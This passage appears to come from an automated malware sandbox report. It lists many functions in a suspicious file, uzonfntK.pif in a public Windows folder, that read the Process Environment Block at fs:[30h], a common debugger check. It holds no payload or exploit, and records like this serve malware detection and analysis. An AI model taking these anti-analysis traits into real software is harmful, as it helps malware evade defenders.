                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002CF0 mov eax, dword ptr fs:[00000030h]3_2_29002CF0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD00 mov eax, dword ptr fs:[00000030h]3_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD00 mov eax, dword ptr fs:[00000030h]3_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEAD00 mov eax, dword ptr fs:[00000030h]3_2_28FEAD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29086F00 mov eax, dword ptr fs:[00000030h]3_2_29086F00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6EE0 mov eax, dword ptr fs:[00000030h]3_2_28FD6EE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CF1F mov eax, dword ptr fs:[00000030h]3_2_2900CF1F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054F40 mov eax, dword ptr fs:[00000030h]3_2_29054F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074F42 mov eax, dword ptr fs:[00000030h]3_2_29074F42
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CF50 mov eax, dword ptr fs:[00000030h]3_2_2900CF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29070F50 mov eax, dword ptr fs:[00000030h]3_2_29070F50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4F68 mov eax, dword ptr fs:[00000030h]3_2_290A4F68
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072F60 mov eax, dword ptr fs:[00000030h]3_2_29072F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072F60 mov eax, dword ptr fs:[00000030h]3_2_29072F60
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCAE90 mov eax, dword ptr fs:[00000030h]3_2_28FCAE90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCAE90 mov eax, dword ptr fs:[00000030h]3_2_28FCAE90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCAE90 mov eax, dword ptr fs:[00000030h]3_2_28FCAE90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900CF80 mov eax, dword ptr fs:[00000030h]3_2_2900CF80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6E71 mov eax, dword ptr fs:[00000030h]3_2_28FD6E71
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002F98 mov eax, dword ptr fs:[00000030h]3_2_29002F98
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002F98 mov eax, dword ptr fs:[00000030h]3_2_29002F98
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8E1D mov eax, dword ptr fs:[00000030h]3_2_28FC8E1D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4FE7 mov eax, dword ptr fs:[00000030h]3_2_290A4FE7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010FF6 mov eax, dword ptr fs:[00000030h]3_2_29010FF6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29086FF7 mov eax, dword ptr fs:[00000030h]3_2_29086FF7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov ecx, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAE00 mov eax, dword ptr fs:[00000030h]3_2_28FFAE00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEFD8 mov eax, dword ptr fs:[00000030h]3_2_28FCEFD8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEFD8 mov eax, dword ptr fs:[00000030h]3_2_28FCEFD8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCEFD8 mov eax, dword ptr fs:[00000030h]3_2_28FCEFD8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066E20 mov eax, dword ptr fs:[00000030h]3_2_29066E20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066E20 mov eax, dword ptr fs:[00000030h]3_2_29066E20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066E20 mov ecx, dword ptr fs:[00000030h]3_2_29066E20
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2FC8 mov eax, dword ptr fs:[00000030h]3_2_28FD2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2E4F mov eax, dword ptr fs:[00000030h]3_2_290A2E4F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A2E4F mov eax, dword ptr fs:[00000030h]3_2_290A2E4F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050E7F mov eax, dword ptr fs:[00000030h]3_2_29050E7F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050E7F mov eax, dword ptr fs:[00000030h]3_2_29050E7F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29050E7F mov eax, dword ptr fs:[00000030h]3_2_29050E7F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAF69 mov eax, dword ptr fs:[00000030h]3_2_28FFAF69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFAF69 mov eax, dword ptr fs:[00000030h]3_2_28FFAF69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002E9C mov eax, dword ptr fs:[00000030h]3_2_29002E9C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29002E9C mov ecx, dword ptr fs:[00000030h]3_2_29002E9C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CEA0 mov eax, dword ptr fs:[00000030h]3_2_2905CEA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CEA0 mov eax, dword ptr fs:[00000030h]3_2_2905CEA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905CEA0 mov eax, dword ptr fs:[00000030h]3_2_2905CEA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCCF50 mov eax, dword ptr fs:[00000030h]3_2_28FCCF50
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906AEB0 mov eax, dword ptr fs:[00000030h]3_2_2906AEB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2906AEB0 mov eax, dword ptr fs:[00000030h]3_2_2906AEB0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFEF28 mov eax, dword ptr fs:[00000030h]3_2_28FFEF28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29086ED0 mov ecx, dword ptr fs:[00000030h]3_2_29086ED0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2F12 mov eax, dword ptr fs:[00000030h]3_2_28FD2F12
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29008EF5 mov eax, dword ptr fs:[00000030h]3_2_29008EF5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov eax, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E10E mov ecx, dword ptr fs:[00000030h]3_2_2907E10E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCC0F0 mov eax, dword ptr fs:[00000030h]3_2_28FCC0F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD80E9 mov eax, dword ptr fs:[00000030h]3_2_28FD80E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29090115 mov eax, dword ptr fs:[00000030h]3_2_29090115
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA0E3 mov ecx, dword ptr fs:[00000030h]3_2_28FCA0E3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov ecx, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov eax, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov eax, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907A118 mov eax, dword ptr fs:[00000030h]3_2_2907A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29000124 mov eax, dword ptr fs:[00000030h]3_2_29000124
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov ecx, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29064144 mov eax, dword ptr fs:[00000030h]3_2_29064144
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC80A0 mov eax, dword ptr fs:[00000030h]3_2_28FC80A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29068158 mov eax, dword ptr fs:[00000030h]3_2_29068158
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4164 mov eax, dword ptr fs:[00000030h]3_2_290A4164
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A4164 mov eax, dword ptr fs:[00000030h]3_2_290A4164
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD208A mov eax, dword ptr fs:[00000030h]3_2_28FD208A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908C188 mov eax, dword ptr fs:[00000030h]3_2_2908C188
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908C188 mov eax, dword ptr fs:[00000030h]3_2_2908C188
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29010185 mov eax, dword ptr fs:[00000030h]3_2_29010185
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074180 mov eax, dword ptr fs:[00000030h]3_2_29074180
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29074180 mov eax, dword ptr fs:[00000030h]3_2_29074180
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FFC073 mov eax, dword ptr fs:[00000030h]3_2_28FFC073
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]3_2_2905019F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]3_2_2905019F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]3_2_2905019F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]3_2_2905019F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD2050 mov eax, dword ptr fs:[00000030h]3_2_28FD2050
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290961C3 mov eax, dword ptr fs:[00000030h]3_2_290961C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290961C3 mov eax, dword ptr fs:[00000030h]3_2_290961C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]3_2_2904E1D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]3_2_2904E1D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E1D0 mov ecx, dword ptr fs:[00000030h]3_2_2904E1D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]3_2_2904E1D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]3_2_2904E1D0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA020 mov eax, dword ptr fs:[00000030h]3_2_28FCA020
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCC020 mov eax, dword ptr fs:[00000030h]3_2_28FCC020
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]3_2_28FEE016
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]3_2_28FEE016
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]3_2_28FEE016
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]3_2_28FEE016
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A61E5 mov eax, dword ptr fs:[00000030h]3_2_290A61E5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290001F8 mov eax, dword ptr fs:[00000030h]3_2_290001F8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29054000 mov ecx, dword ptr fs:[00000030h]3_2_29054000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]3_2_29072000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29066030 mov eax, dword ptr fs:[00000030h]3_2_29066030
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29056050 mov eax, dword ptr fs:[00000030h]3_2_29056050
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA197 mov eax, dword ptr fs:[00000030h]3_2_28FCA197
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA197 mov eax, dword ptr fs:[00000030h]3_2_28FCA197
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA197 mov eax, dword ptr fs:[00000030h]3_2_28FCA197
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6154 mov eax, dword ptr fs:[00000030h]3_2_28FD6154
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6154 mov eax, dword ptr fs:[00000030h]3_2_28FD6154
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCC156 mov eax, dword ptr fs:[00000030h]3_2_28FCC156
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290680A8 mov eax, dword ptr fs:[00000030h]3_2_290680A8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290960B8 mov eax, dword ptr fs:[00000030h]3_2_290960B8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290960B8 mov ecx, dword ptr fs:[00000030h]3_2_290960B8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290520DE mov eax, dword ptr fs:[00000030h]3_2_290520DE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290560E0 mov eax, dword ptr fs:[00000030h]3_2_290560E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290120F0 mov ecx, dword ptr fs:[00000030h]3_2_290120F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900A30B mov eax, dword ptr fs:[00000030h]3_2_2900A30B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900A30B mov eax, dword ptr fs:[00000030h]3_2_2900A30B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2900A30B mov eax, dword ptr fs:[00000030h]3_2_2900A30B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE02E1 mov eax, dword ptr fs:[00000030h]3_2_28FE02E1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE02E1 mov eax, dword ptr fs:[00000030h]3_2_28FE02E1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE02E1 mov eax, dword ptr fs:[00000030h]3_2_28FE02E1
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A8324 mov eax, dword ptr fs:[00000030h]3_2_290A8324
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A8324 mov ecx, dword ptr fs:[00000030h]3_2_290A8324
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A8324 mov eax, dword ptr fs:[00000030h]3_2_290A8324
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A8324 mov eax, dword ptr fs:[00000030h]3_2_290A8324
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]3_2_28FDA2C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]3_2_28FDA2C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]3_2_28FDA2C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]3_2_28FDA2C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]3_2_28FDA2C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A634F mov eax, dword ptr fs:[00000030h]3_2_290A634F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]3_2_29052349
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29078350 mov ecx, dword ptr fs:[00000030h]3_2_29078350
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]3_2_2905035C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]3_2_2905035C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]3_2_2905035C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905035C mov ecx, dword ptr fs:[00000030h]3_2_2905035C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]3_2_2905035C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]3_2_2905035C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2909A352 mov eax, dword ptr fs:[00000030h]3_2_2909A352
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE02A0 mov eax, dword ptr fs:[00000030h]3_2_28FE02A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE02A0 mov eax, dword ptr fs:[00000030h]3_2_28FE02A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907437C mov eax, dword ptr fs:[00000030h]3_2_2907437C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC826B mov eax, dword ptr fs:[00000030h]3_2_28FC826B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD4260 mov eax, dword ptr fs:[00000030h]3_2_28FD4260
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD4260 mov eax, dword ptr fs:[00000030h]3_2_28FD4260
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD4260 mov eax, dword ptr fs:[00000030h]3_2_28FD4260
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD6259 mov eax, dword ptr fs:[00000030h]3_2_28FD6259
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCA250 mov eax, dword ptr fs:[00000030h]3_2_28FCA250
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908C3CD mov eax, dword ptr fs:[00000030h]3_2_2908C3CD
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290563C0 mov eax, dword ptr fs:[00000030h]3_2_290563C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC823B mov eax, dword ptr fs:[00000030h]3_2_28FC823B
